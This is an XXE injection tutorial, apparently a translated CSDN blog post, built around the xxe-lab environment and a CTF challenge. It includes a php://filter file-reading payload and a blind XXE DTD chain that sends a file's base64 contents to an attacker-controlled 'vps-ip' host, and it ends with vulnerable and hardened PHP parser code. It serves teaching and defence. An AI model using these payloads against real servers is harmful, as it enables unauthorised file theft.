XML external entity injection; XXE vulnerability; XXE with echo; XXE without echo; blind XXE

Vulnerability principle

An XXE vulnerability occurs when an application parses XML input without prohibiting the loading of external entities, so that malicious external entities are loaded; this can lead to file reading, command execution, and intranet port scanning. XXE is often triggered wherever an XML file can be uploaded: if the uploaded XML is not filtered, a malicious XML file can be submitted.

Environment setup

Address: https://github.com/c0ny1/xxe-lab
After downloading, place PHP_XXE in the www directory of PHPstudy so it can be accessed.

XXE has echo injection

First, capture the packet at login. You can see that the parameters are sent in XML format, so there may be XML injection.
Send the packet to the Repeater module for further analysis.
You can see that the content echoed in the response is the username, so the XXE vulnerability can be used to read a file.
A txt file can be read directly, but when reading a php file the php code may not be displayed because the browser parses it. This requires base64-encoding the content before reading it out:

php://filter/read=convert.base64-encode/resource=<file path>

Base64-decoding the result gives the content of abc.php.

XXE without echo (blind XXE)

When a web application parses XML input but returns no output in the response, the injection is called blind XXE. To test for blind XXE, instead of an external entity pointing at a file path, we use an external entity pointing at a server we control and have the web application make a request to it.

A challenge from CTFShow is used here to explain it.
https://ctf.show/challenges#web4_%E8%A7%82%E5%BF%83-340
Click "divination" and capture the packet to look at the data. Seeing that it requests an external xml, it can be inferred that there is XXE injection.
Because the request is initiated from a server on the public network, we need to construct the attack chain on our own server.
First, start the Apache service and place the constructed files under /var/www/html so they can be accessed.

service apache2 start

Create test.xml:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

Create test.dtd:

<!ENTITY % dtd "<!ENTITY xxe SYSTEM 'http://vps-ip/pass=%file;'>">
%dtd;
%xxe;

Then initiate the request and get the flag.
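Seen from the application side, the echoed variant and the blind variant above come down to the same parser configuration. The following is an added PHP example, not code from the post or from xxe-lab: a login handler of the shape tested above, first in the vulnerable form (entity substitution and DTD loading enabled) and then hardened so that neither a file-reading entity nor an out-of-band DTD fetch is possible; the function names and the sample requests are assumptions.

```php
<?php
// Added example (not from the post or from xxe-lab). The handler reads
// <user><username>..</username><password>..</password></user> and returns
// the username, which is what the login response echoes back.

// VULNERABLE pattern: LIBXML_NOENT substitutes entity references and
// LIBXML_DTDLOAD fetches external DTDs, so a DOCTYPE in the request can read
// a local file (echoed through <username>) or pull an attacker DTD (blind XXE).
function parseLoginVulnerable(string $xml): ?string
{
    $dom = new DOMDocument();
    if (!@$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD)) {
        return null;
    }
    $node = $dom->getElementsByTagName('username')->item(0);
    return $node ? $node->textContent : null;
}

// HARDENED: refuse any DTD up front (no DOCTYPE means no entity declarations of
// any kind: internal, external or parameter), never pass LIBXML_NOENT or
// LIBXML_DTDLOAD, and add LIBXML_NONET so the parser cannot open network
// resources at all. A second check on $dom->doctype backs up the text match.
function parseLoginHardened(string $xml): ?string
{
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        error_log('rejected XML login request containing a DOCTYPE');
        return null;
    }
    $prev = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok || $dom->doctype !== null) {
        return null;
    }
    $node = $dom->getElementsByTagName('username')->item(0);
    return $node ? $node->textContent : null;
}

// Constructed inputs: a normal login and a request that carries a DOCTYPE.
$benign = '<?xml version="1.0"?><user><username>admin</username><password>x</password></user>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE user [<!ENTITY e "expanded">]>'
         . '<user><username>&e;</username><password>x</password></user>';

var_dump(parseLoginHardened($benign));   // the username is returned
var_dump(parseLoginHardened($withDtd));  // refused before the DTD is processed
```

The same check belongs at any endpoint that accepts XML, not only the login handler: the blind payload above never needs the response, so a DOCTYPE anywhere in request XML should be logged and refused.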


Source: blog.csdn.net/weixin_43749601/article/details/115330101